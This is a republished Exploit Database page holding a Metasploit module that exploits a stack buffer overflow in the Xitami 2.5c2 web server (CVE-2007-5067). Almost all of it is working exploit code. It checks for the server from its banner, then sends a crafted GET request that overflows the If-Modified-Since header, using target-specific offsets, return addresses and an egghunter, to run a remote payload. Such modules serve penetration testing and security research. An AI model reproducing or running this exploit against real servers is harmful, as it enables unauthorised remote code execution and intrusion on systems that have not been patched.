Xitami Web Server 2.5c2 – If-Modified-Since Overflow (Metasploit)

• Exploit Database
• 10 阅读

• 作者： Metasploit
  日期： 2010-08-25
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/16753/

• ##
  # $Id: xitami_if_mod_since.rb 10150 2010-08-25 20:55:37Z jduck $
  ##
  
  ##
  # This file is part of the Metasploit Framework and may be subject to
  # redistribution and commercial restrictions. Please see the Metasploit
  # Framework web site for more information on licensing and terms of use.
  # http://metasploit.com/framework/
  ##
  
  require 'msf/core'
  
  
  class Metasploit3 < Msf::Exploit::Remote
  	Rank = AverageRanking
  
  	include Msf::Exploit::Remote::Tcp
  	include Msf::Exploit::Remote::Egghunter
  
  	def initialize(info = {})
  		super(update_info(info,
  			'Name'		=> 'Xitami 2.5c2 Web Server If-Modified-Since Overflow',
  			'Description'	=> %q{
  				This module exploits a stack buffer overflow in the iMatix Corporation
  				Xitami Web Server. If a malicious user sends an	If-Modified-Since
  				header containing an overly long string, it may be possible to
  				execute a payload remotely. Due to size constraints, this module uses
  				the Egghunter technique.
  			},
  			'Author' 	=> 'patrick',
  			'License' => MSF_LICENSE,
  			'Version' => '$Revision: 10150 $',
  			'References'=>
  			[
  				[ 'CVE', '2007-5067' ],
  				[ 'OSVDB', '40594'],
  				[ 'OSVDB', '40595'],
  				[ 'BID', '25772' ],
  				[ 'URL', 'http://www.milw0rm.com/exploits/4450' ],
  			],
  			'Privileged'		=> false,
  			'DefaultOptions'	=>
  			{
  				'EXITFUNC'	=> 'process',
  			},
  			'Payload'		=>
  				{
  					'Space'		=> 700,
  					'BadChars' 	=> "\x00\x0a\x0d",
  				},
  			'Platform' => ['win'],
  			'Targets'=>
  			[
  			# Patrick - Both tested OK 20070928 - w2ksp0, w2ksp4, xpsp0, xpsp2 en.
  				[ 'xigui32.exe Universal', { 'Ret' => "\xff\xce\x44", 'Offset' => 40 } ], # 0x0044ceff ret xigui32.exe
  				[ 'xitami.exeUniversal', { 'Ret' => "\xf2\xc1\x47", 'Offset' => 68 } ], # 0x0047c1f2 ret xitami.exe
  			],
  			'DisclosureDate' => 'Sep 24 2007',
  			'DefaultTarget' => 0))
  
  			register_options(
  			[
  				Opt::RPORT(80),
  			],self.class)
  	end
  
  	def check
  		connect
  		sock.put("GET / HTTP/1.1\r\n\r\n")
  		banner = sock.get(-1,3)
  		disconnect
  
  		if (banner =~ /Xitami/)
  			return Exploit::CheckCode::Appears
  		end
  			return Exploit::CheckCode::Safe
  	end
  
  	def exploit
  		connect
  
  		hunter= generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
  		egg = hunter[1]
  
  		sploit = "GET / HTTP/1.1\r\n"
  		sploit << "Host: " + egg + "\r\n"
  		sploit << "If-Modified-Since: " + Rex::Arch::X86.jmp_short(3) + ", "
  		sploit << hunter[0] + rand_text_alphanumeric(target['Offset']) + target['Ret']
  
  		sock.put(sploit + "\r\n\r\n")
  
  		print_status("Waiting for payload to execute...")
  
  		handler
  		disconnect
  	end
  
  end